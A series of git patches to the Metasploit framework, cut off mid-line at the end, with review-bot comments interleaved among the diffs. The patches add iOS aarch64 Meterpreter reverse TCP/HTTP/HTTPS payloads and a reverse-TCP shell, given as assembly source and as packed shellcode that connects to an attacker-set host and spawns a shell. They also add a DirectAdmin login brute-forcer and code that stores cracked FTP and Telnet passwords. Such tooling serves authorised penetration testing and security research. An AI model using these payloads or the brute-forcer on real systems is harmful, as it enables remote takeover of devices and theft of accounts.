changed, 174 insertions(+), 3 deletions(-) create mode 100644 lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb create mode 100644 modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb create mode 100644 modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb b/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb new file mode 100644 index 0000000000..49859514e6 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb 
@@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'apple_ios' + self.base_arch = ARCH_AARCH64 + end +end + +end +end + diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index de0e7fbaca..3ca4373e70 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -560,4 +560,12 @@ class Msf::Module::Platform Alias = "hardware" end + # + # Apple iOS + # + class Apple_iOS < Msf::Module::Platform + Rank = 100 + Alias = "apple_ios" + end + end diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index f510c88469..6d98f77934 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb @@ -72,7 +72,8 @@ class Msf::Payload::UUID 21 => 'python', 22 => 'nodejs', 23 => 'firefox', - 24 => 'r' + 24 => 'r', + 25 => 'apple_ios', } # The raw length of the UUID structure diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index e436abba9d..c87049bf46 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote 'BadChars' => '', 'DisableNops' => true }, - 'Platform' => %w[android bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi], + 'Platform' => %w[android apple_ios bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi], 'Arch' => ARCH_ALL, 'Targets' => [ [ 'Wildcard Target', {} ] ], 'DefaultTarget' => 0, 
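Review bot: `Meterpreter_aarch64_Apple_iOS` overrides `supports_ssl?` and `supports_zlib?` to return `false` with no explanation, and the three `def`s are run together without blank lines between them; separate the methods with a blank line and add a why-comment above the pair, e.g. `# SSL and zlib are not available in the aarch64-iphone-darwin Mettle build — confirm against the payload`, since the reason is presumably the payload build rather than the platform itself. `opts={}` in `initialize(rstream, opts={})` would also read better as `opts = {}`.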
diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..c8ac809abd --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_apple_ios' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple_iOS Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS + ) + ) + end + + def generate + opts = { + scheme: 'http', + stageless: true + } + MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..01758f1e19 --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb 
@@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_apple_ios' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple_iOS Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS + ) + ) + end + + def generate + opts = { + scheme: 'https', + stageless: true + } + MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..a3d0a0181e --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb 
@@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_apple_ios' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple_iOS Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS + ) + ) + end + + def generate + opts = { + scheme: 'tcp', + stageless: true + } + MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb index 3e3c627562..c9b7dddc94 100755 --- a/tools/modules/generate_mettle_payloads.rb +++ b/tools/modules/generate_mettle_payloads.rb @@ -25,6 +25,7 @@ arches = [ ['x86', 'Linux', 'i486-linux-musl'], ['zarch', 'Linux', 's390x-linux-musl'], ['x64', 'OSX', 'x86_64-apple-darwin'], + ['aarch64', 'Apple_iOS', 'aarch64-iphone-darwin'], ] arch = '' @@ -42,7 +43,7 @@ arches.each do |a, pl, pa| template = File::read(File::join(cwd, "meterpreter_reverse.erb")) renderer = ERB.new(template) - filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb") + filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb") File::write(filename, renderer.result()) end end 
From be4939b56a74b67ee2fc57b5e150df608727ae60 Mon Sep 17 00:00:00 2001 From: nromsdahl Date: Thu, 14 Dec 2017 08:05:57 -0600 Subject: [PATCH 14/37] Add credential data type Added credential data type so a successful ftp login stores the password in the database to be accessed later by the creds command. --- modules/auxiliary/scanner/ftp/ftp_login.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 1aa1f1fc1b..ae2c3106fe 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -94,6 +94,7 @@ class MetasploitModule < Msf::Auxiliary workspace_id: myworkspace_id ) if result.success? + credential_data[:private_type] = :password credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) From 384b250659cee5ec0fb99a64bab4accbd8955bdf Mon Sep 17 00:00:00 2001 From: nromsdahl Date: Thu, 14 Dec 2017 08:07:59 -0600 Subject: [PATCH 15/37] Add credential data type Added credential data type so that successful passwords are stored in the database and accessible via the creds command. --- modules/auxiliary/scanner/telnet/telnet_login.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index c57ca7e49c..82c1452813 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -85,6 +85,7 @@ class MetasploitModule < Msf::Auxiliary workspace_id: myworkspace_id ) if result.success? + credential_data[:private_type] = :password credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) From 084dc4470d47ac1b032790ed25d8d3ca9a84d749 Mon Sep 17 00:00:00 2001 
From: Pearce Barry Date: Fri, 15 Dec 2017 12:19:26 -0600 Subject: [PATCH 16/37] Ensure tab completion in HWBridge sessions works as expected. --- lib/msf/base/sessions/hwbridge.rb | 3 ++- lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb | 6 +++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/msf/base/sessions/hwbridge.rb b/lib/msf/base/sessions/hwbridge.rb index e04e7609ed..e6c9bc6190 100644 --- a/lib/msf/base/sessions/hwbridge.rb +++ b/lib/msf/base/sessions/hwbridge.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/base' - +require 'msf/base/sessions/scriptable' require 'rex/post/hwbridge' module Msf @@ -24,6 +24,7 @@ class HWBridge < Rex::Post::HWBridge::Client # This interface supports interactive commands. # include Msf::Session::Interactive + include Msf::Session::Scriptable # # Initialize the HWBridge console diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb index b514a8902a..124ee8ca55 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb @@ -414,11 +414,11 @@ class Console::CommandDispatcher::Core if !words[1] || !words[1].match(/^\//) begin if msf_loaded? - tabs << tab_complete_postmods + tabs = tab_complete_postmods end [ # We can just use Meterpreters script path - ::Msf::Sessions::Meterpreter.script_base, - ::Msf::Sessions::Meterpreter.user_script_base + ::Msf::Sessions::HWBridge.script_base, + ::Msf::Sessions::HWBridge.user_script_base ].each do |dir| next unless ::File.exist? dir tabs += ::Dir.new(dir).find_all { |e| From f447fa1a12cb00f40f34c3d1b8a303957f4f8ec0 Mon Sep 17 00:00:00 2001 
From: Nick Marcoccio Date: Sun, 17 Dec 2017 22:43:37 -0500 Subject: [PATCH 17/37] Added DirectAdmin Login Utillity --- .../framework/login_scanner/directadmin.rb | 119 +++++++++++++++ .../scanner/http/directadmin_login.rb | 135 ++++++++++++++++++ 2 files changed, 254 insertions(+) create mode 100644 lib/metasploit/framework/login_scanner/directadmin.rb create mode 100644 modules/auxiliary/scanner/http/directadmin_login.rb diff --git a/lib/metasploit/framework/login_scanner/directadmin.rb b/lib/metasploit/framework/login_scanner/directadmin.rb new file mode 100644 index 0000000000..f68f4305bc --- /dev/null +++ b/lib/metasploit/framework/login_scanner/directadmin.rb 
@@ -0,0 +1,119 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+ module Framework
+ module LoginScanner
+
+ class DirectAdmin < HTTP
+
+ DEFAULT_PORT = 443
+ PRIVATE_TYPES = [ :password ]
+ LOGIN_STATUS = Metasploit::Model::Login::Status # Shorter name
+
+
+ # Checks if the target is Direct Admin Web Control Panel. The login module should call this.
+ #
+ # @return [Boolean] TrueClass if target is DAWCP, otherwise FalseClass
+ def check_setup
+ login_uri = normalize_uri("#{uri}/CMD_LOGIN")
+ res = send_request({'uri'=> login_uri})
+
+ if res && res.body.include?('DirectAdmin Login')
+ return true
+ end
+
+ false
+ end
+
+
+ # Returns the latest sid from Symantec Web Gateway.
+ #
+ # @return [String] The PHP Session ID for DirectAdmin Web Control login
+ def get_last_sid
+ @last_sid ||= lambda {
+ # We don't have a session ID. Well, let's grab one right quick from the login page.
+ # This should probably only happen once (initially).
+ login_uri = normalize_uri("#{uri}/CMD_LOGIN")
+ res = send_request({'uri' => login_uri})
+
+ return '' unless res
+
+ cookies = res.get_cookies
+ @last_sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
+ }.call
+ end
+
+
+ # Actually doing the login. Called by #attempt_login
+ #
+ # @param username [String] The username to try
+ # @param password [String] The password to try
+ # @return [Hash]
+ # * :status [Metasploit::Model::Login::Status]
+ # * :proof [String] the HTTP response body
+ def get_login_state(username, password)
+ # Prep the data needed for login
+ sid = get_last_sid
+ protocol = ssl ? 'https' : 'http'
+ peer = "#{host}:#{port}"
+ login_uri = normalize_uri("#{uri}/CMD_LOGIN")
+
+ res = send_request({
+ 'uri' => login_uri,
+ 'method' => 'POST',
+ 'cookie' => sid,
+ 'headers' => {
+ 'Referer' => "#{protocol}://#{peer}/#{login_uri}"
+ },
+ 'vars_post' => {
+ 'username' => username,
+ 'password' => password,
+ 'referer' => '%2F'
+ }
+ })
+
+ unless res
+ return {:status => LOGIN_STATUS::UNABLE_TO_CONNECT, :proof => res.to_s}
+ end
+
+ # After login, the application should give us a new SID
+ cookies = res.get_cookies
+ sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
+ @last_sid = sid # Update our SID
+
+ if res.headers['Location'].to_s.include?('/') && !sid.blank?
+ return {:status => LOGIN_STATUS::SUCCESSFUL, :proof => res.to_s}
+ end
+
+ {:status => LOGIN_STATUS::INCORRECT, :proof => res.to_s}
+ end
+
+
+ # Attempts to login to DirectAdmin Web Control Panel. This is called first.
+ #
+ # @param credential [Metasploit::Framework::Credential] The credential object
+ # @return [Result] A Result object indicating success or failure
+ def attempt_login(credential)
+ result_opts = {
+ credential: credential,
+ status: Metasploit::Model::Login::Status::INCORRECT,
+ proof: nil,
+ host: host,
+ port: port,
+ protocol: 'tcp'
+ }
+
+ begin
+ result_opts.merge!(get_login_state(credential.public, credential.private))
+ rescue ::Rex::ConnectionError => e
+ # Something went wrong during login. 'e' knows what's up.
+ result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
+ end
+
+ Result.new(result_opts)
+ end
+
+ end
+ end
+ end
+end
diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb
new file mode 100644
index 0000000000..0c9e709e05
--- /dev/null
+++ b/modules/auxiliary/scanner/http/directadmin_login.rb
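Review bot: The success test in get_login_state, `res.headers['Location'].to_s.include?('/') && !sid.blank?`, treats almost any redirect that arrives with a fresh `session=` cookie as a valid login, so a rejected attempt that redirects back to the login page with a new cookie would be recorded as SUCCESSFUL. Checking that the Location does not point back at `CMD_LOGIN`, or following it once, would make the verdict depend on the application's answer rather than on cookie issuance; I cannot confirm DirectAdmin's redirect behaviour from here. Separately, `proof: res.to_s` persists the whole response, including the Set-Cookie line carrying the live session token, in the credential login record; the status line plus `res.headers['Location']` is enough to justify the result without storing a usable session. The Referer built as `"#{protocol}://#{peer}/#{login_uri}"` also carries a doubled slash, since normalize_uri appears to return a path that already starts with `/`.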
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/login_scanner/directadmin'
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'DirectAdmin Web Control Panel Login Utility',
+ 'Description' => %q{
+ This module will attempt to authenticate to a DirectAdmin Web Control Panel.
+ },
+ 'Author' => [ '1oopho1e - Nick Marcoccio' ],
+ 'License' => MSF_LICENSE,
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 2222,
+ 'SSL' => true,
+ }
+ ))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),
+ OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),
+ ])
+ end
+
+
+ def scanner(ip)
+ @scanner ||= lambda {
+ cred_collection = Metasploit::Framework::CredentialCollection.new(
+ blank_passwords: datastore['BLANK_PASSWORDS'],
+ pass_file: datastore['PASS_FILE'],
+ password: datastore['PASSWORD'],
+ user_file: datastore['USER_FILE'],
+ userpass_file: datastore['USERPASS_FILE'],
+ username: datastore['USERNAME'],
+ user_as_pass: datastore['USER_AS_PASS']
+ )
+
+ return Metasploit::Framework::LoginScanner::DirectAdmin.new(
+ configure_http_login_scanner(
+ host: ip,
+ port: datastore['RPORT'],
+ cred_details: cred_collection,
+ stop_on_success: datastore['STOP_ON_SUCCESS'],
+ bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+ connection_timeout: 5,
+ http_username: datastore['HttpUsername'],
+ http_password: datastore['HttpPassword']
+ ))
+ }.call
+ end
+
+
+ def report_good_cred(ip, port, result)
+ service_data = {
+ address: ip,
+ port: port,
+ service_name: 'http',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ module_fullname: self.fullname,
+ origin_type: :service,
+ private_data: result.credential.private,
+ private_type: :password,
+ username: result.credential.public,
+ }.merge(service_data)
+
+ login_data = {
+ core: create_credential(credential_data),
+ last_attempted_at: DateTime.now,
+ status: result.status,
+ proof: result.proof
+ }.merge(service_data)
+
+ create_credential_login(login_data)
+ end
+
+
+ def report_bad_cred(ip, rport, result)
+ invalidate_login(
+ address: ip,
+ port: rport,
+ protocol: 'tcp',
+ public: result.credential.public,
+ private: result.credential.private,
+ realm_key: result.credential.realm_key,
+ realm_value: result.credential.realm,
+ status: result.status,
+ proof: result.proof
+ )
+ end
+
+
+ # Attempts to login
+ def bruteforce(ip)
+ scanner(ip).scan! do |result|
+ case result.status
+ when Metasploit::Model::Login::Status::SUCCESSFUL
+ print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")
+ report_good_cred(ip, rport, result)
+ when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+ vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)
+ report_bad_cred(ip, rport, result)
+ when Metasploit::Model::Login::Status::INCORRECT
+ vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")
+ report_bad_cred(ip, rport, result)
+ end
+ end
+ end
+
+
+ # Start here
+ def run_host(ip)
+ unless scanner(ip).check_setup
+ print_brute(:level => :error, :ip => ip, :msg => 'Target is not DirectAdmin Web Control Panel')
+ return
+ end
+
+ bruteforce(ip)
+ end
+end
From be2a3ca270b52f8843796aec834c4884922f1e52 Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Mon, 18 Dec 2017 08:18:02 -0500 Subject: [PATCH 18/37] edited sid comment --- lib/metasploit/framework/login_scanner/directadmin.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
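Review bot: run_host calls `scanner(ip).check_setup` with no rescue, and check_setup issues an HTTP request, so an unreachable or resetting host raises `Rex::ConnectionError` straight out of run_host instead of producing the quiet verbose line that bruteforce gives the UNABLE_TO_CONNECT case (whether the Scanner mixin catches it further up I cannot tell from here). Wrapping the probe gives every host the same reporting path and lets the scan continue. The rest of run_host is unchanged apart from testing the captured result.
```ruby
  def run_host(ip)
    begin
      detected = scanner(ip).check_setup
    rescue ::Rex::ConnectionError => e
      vprint_brute(:level => :verror, :ip => ip, :msg => e.message)
      return
    end

    unless detected
      # … unchanged: 'Target is not DirectAdmin Web Control Panel' message and return …
    end
    # … unchanged: bruteforce(ip) …
  end
```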
diff --git a/lib/metasploit/framework/login_scanner/directadmin.rb b/lib/metasploit/framework/login_scanner/directadmin.rb index f68f4305bc..f654676d0c 100644 --- a/lib/metasploit/framework/login_scanner/directadmin.rb +++ b/lib/metasploit/framework/login_scanner/directadmin.rb @@ -26,7 +26,7 @@ module Metasploit end - # Returns the latest sid from Symantec Web Gateway. + # Returns the latest sid from DirectAdmin Control Panel # # @return [String] The PHP Session ID for DirectAdmin Web Control login def get_last_sid From 6d565b6c3350592754398cb8240ff2be706f5d9b Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Mon, 18 Dec 2017 09:18:36 -0500 Subject: [PATCH 19/37] added author information --- modules/auxiliary/scanner/http/directadmin_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb index 0c9e709e05..f8dd4ea9cb 100644 --- a/modules/auxiliary/scanner/http/directadmin_login.rb +++ b/modules/auxiliary/scanner/http/directadmin_login.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module will attempt to authenticate to a DirectAdmin Web Control Panel. }, - 'Author' => [ '1oopho1e - Nick Marcoccio' ], + 'Author' => [ 'Nick Marcoccio "1oopho1e" remembermodems[at]gmail.com' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { From 369d74cdb2afb944cb0a48c9870228a5197b812d Mon Sep 17 00:00:00 2001 From: Ryan Knell Date: Mon, 18 Dec 2017 10:34:00 -0500 Subject: [PATCH 20/37] Updating documentation Added a missing backtick --- documentation/modules/auxiliary/dos/http/ws_dos.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/auxiliary/dos/http/ws_dos.md b/documentation/modules/auxiliary/dos/http/ws_dos.md index 6668f471df..49da03e26f 100644 --- a/documentation/modules/auxiliary/dos/http/ws_dos.md +++ b/documentation/modules/auxiliary/dos/http/ws_dos.md 
@@ -11,7 +11,7 @@ on the initial WebSocket upgrade request, the ws component will crash. 1. Start the vulnerable server using the sample server code below `node server.js` 2. Start `msfconsole` 3. `use auxiliary/dos/http/ws_dos` -4. `set RHOST +4. `set RHOST ` 5. `run` 6. The server should crash From 358aca943508357b852dabdab5f6ad46cb8faef4 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 19 Dec 2017 15:39:29 +0800 Subject: [PATCH 21/37] apple_ios/aarch64/shell_reverse_tcp --- .../aarch64/single_reverse_tcp_shell.s | 72 ++++++++++++++ .../apple_ios/aarch64/shell_reverse_tcp.rb | 97 +++++++++++++++++++ 2 files changed, 169 insertions(+) create mode 100644 external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s create mode 100644 modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb diff --git a/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s new file mode 100644 index 0000000000..1166d26202 --- /dev/null +++ b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s 
@@ -0,0 +1,72 @@ +.equ SYS_SOCKET, 0x61 +.equ SYS_CONNECT, 0x62 +.equ SYS_DUP2, 0x5a +.equ SYS_EXECVE, 0x3b +.equ SYS_EXIT, 0x01 + +.equ AF_INET, 0x2 +.equ SOCK_STREAM, 0x1 + +.equ STDIN, 0x0 +.equ STDOUT, 0x1 +.equ STDERR, 0x2 + +.equ IP, 0x0100007f +.equ PORT, 0x5C11 + +_start: + // sockfd = socket(AF_INET, SOCK_STREAM, 0) + mov x0, AF_INET + mov x1, SOCK_STREAM + mov x2, 0 + mov x16, SYS_SOCKET + svc 0 + mov x3, x0 + + // connect(sockfd, (struct sockaddr *)&server, sockaddr_len) + adr x1, sockaddr + mov x2, 0x10 + mov x16, SYS_CONNECT + svc 0 + cbnz w0, exit + + // dup2(sockfd, STDIN) ... + mov x0, x3 + mov x2, 0 + mov x1, STDIN + mov x16, SYS_DUP2 + svc 0 + mov x1, STDOUT + mov x16, SYS_DUP2 + svc 0 + mov x1, STDERR + mov x16, SYS_DUP2 + svc 0 + + // execve('/system/bin/sh', NULL, NULL) + adr x0, shell + mov x2, 0 + str x0, [sp, 0] + str x2, [sp, 8] + mov x1, sp + mov x16, SYS_EXECVE + svc 0 + +exit: + mov x0, 0 + mov x16, SYS_EXIT + svc 0 + +.balign 4 +sockaddr: + .short AF_INET + .short PORT + .word IP + +shell: +.word 0x00000000 +.word 0x00000000 +.word 0x00000000 +.word 0x00000000 +end: + diff --git a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb new file mode 100644 index 0000000000..7dca1d0ee2 --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb 
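Review bot: The comment `// execve('/system/bin/sh', NULL, NULL)` does not describe this file: the `shell:` label holds four zero words, a 16-byte buffer that is empty in the source and filled in by the payload module at generation time, so the executed path is whatever is written there. A comment such as `// execve(shell, NULL, NULL) - 'shell' is a 16-byte zero-filled buffer patched by the Ruby module` keeps the assembly and the module in step. The sockaddr layout also deserves a sentence: Darwin's `struct sockaddr_in` begins with a one-byte `sin_len` before `sin_family`, so `.short AF_INET` is not the textbook encoding for that platform, and the comment should state whether relying on the kernel to accept it is intentional (I cannot confirm XNU's handling from here). The file also carries no header explaining that `IP` and `PORT` are placeholders overwritten via the module's Offsets table.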
@@ -0,0 +1,97 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 152 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Apple iOS aarch64 Command Shell, Reverse TCP Inline', + 'Description' => 'Connect back to attacker and spawn a command shell', + 'License' => MSF_LICENSE, + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'LHOST' => [ 132, 'ADDR' ], + 'LPORT' => [ 130, 'n' ], + }, + 'Payload' => + [ + # Generated from external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800021, # mov x1, #0x1 // #1 + 0xd2800002, # mov x2, #0x0 // #0 + 0xd2800c30, # mov x16, #0x61 // #97 + 0xd4000001, # svc #0x0 + 0xaa0003e3, # mov x3, x0 + 0x10000341, # adr x1, 80 + 0xd2800202, # mov x2, #0x10 // #16 + 0xd2800c50, # mov x16, #0x62 // #98 + 0xd4000001, # svc #0x0 + 0x35000260, # cbnz w0, 74 + 0xaa0303e0, # mov x0, x3 + 0xd2800002, # mov x2, #0x0 // #0 + 0xd2800001, # mov x1, #0x0 // #0 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0xd2800021, # mov x1, #0x1 // #1 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0xd2800041, # mov x1, #0x2 // #2 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0x10000180, # adr x0, 88 + 0xd2800002, # mov x2, #0x0 // #0 + 0xf90003e0, # str x0, [sp] + 0xf90007e2, # str x2, [sp,#8] + 0x910003e1, # mov x1, sp + 0xd2800770, # mov x16, #0x3b // #59 + 0xd4000001, # svc #0x0 + 0xd2800000, # mov x0, #0x0 // #0 + 0xd2800030, # 
mov x16, #0x1 // #1 + 0xd4000001, # svc #0x0 + 0x5c110002, # .word 0x5c110002 + 0x0100007f, # .word 0x0100007f + 0x00000000, # .word 0x00000000 // shell + 0x00000000, # .word 0x00000000 + 0x00000000, # .word 0x00000000 + 0x00000000, # .word 0x00000000 + ].pack("V*") + } + )) + + # Register command execution options + register_options( + [ + OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]), + ]) + end + + def generate + p = super + + sh = datastore['SHELL'] + if sh.length >= 16 + raise ArgumentError, "The specified shell must be less than 16 bytes." + end + p[136, sh.length] = sh + + p + end +end From acc6951bf3f35c91f30ed3dbfee946df19e367ce Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Tue, 19 Dec 2017 08:35:11 -0500 Subject: [PATCH 22/37] fixed typo --- modules/auxiliary/scanner/http/directadmin_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb index f8dd4ea9cb..a5efe92039 100644 --- a/modules/auxiliary/scanner/http/directadmin_login.rb +++ b/modules/auxiliary/scanner/http/directadmin_login.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module will attempt to authenticate to a DirectAdmin Web Control Panel. }, - 'Author' => [ 